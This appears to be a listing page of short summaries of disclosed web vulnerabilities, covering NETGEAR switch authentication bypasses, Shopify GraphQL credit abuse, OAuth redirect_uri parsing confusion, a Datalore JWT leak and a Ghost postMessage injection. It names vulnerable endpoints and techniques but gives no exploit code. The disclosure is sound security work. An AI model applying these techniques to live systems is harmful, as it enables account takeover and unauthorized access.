The idea here is that by overflowing the value containing the size of a header name you can cause the header to be misinterpreted.
Vulnerabilities tagged 'web'
New-line Injection to Uncontrolled File Write and Authentication Bypass in some NETGEAR Smart Switches
tl;dr A well positioned attacker (needs to be using the same IP as the victim) can hijack a successful authentication flow and take over the session victims session by polling the
get.cgi endpoint after the victim’s login was successful but before the victim has polled the same page (which happens every second)
Easy vulnerability that shows how checking the magic numbers of a file isn’t always sufficient.For some types of files all that matters is that the processor can detect its own content within another file…
The Shopify GraphQL endpoint has a mutation
appCreditCreate for Shopify apps to issue credits to merchants that can be used towards future app purchases.While this mutation cannot be used through the GraphQL endpoint at
/admin/internal/web/graphql/core the GraphiQL app provided by Shopify however does allow the mutation…
Authentication bypass by including a magic string in the URL.The string isn’t exactly magic, rather it seems like this page (setcup.cgi) has a single file that needs to be access without authentication…
I’m not sure what the normal flow for a “One Tap Password” is but
/scauth/otp/droid/logout can be used to retrieve OTP token in the response. Which can be passed to
/scauth/otp/login along with the username to login.
tl;dr - The Oauth endpoint parses URL paramters
redirect_uri[0 (note the missing
]) as pointing to the same variable. Allowing the second to overwrite the first. The front-end however sees them as two distinct keys and so redirects the oauth token to the
redirect_uri while the endpoint validates that the other value points to a whitelisted location
After finding an open redirect in Datalore’s endpoint for authenticating via JetBrains, the author dug into the auth process to see if it could be turned into an attack.They discovered that if an
auth_url parameter was specified (which had to be a valid jetbrains subdomain), Datalore would send the user as as well as their JWT token to the given URL…
Ghost 4.0.0 added a theme preview feature to the admin panel’s front-end.The preview page contains a message event listener for
postMessage(), which will take any messages and directly write that message into the page contents…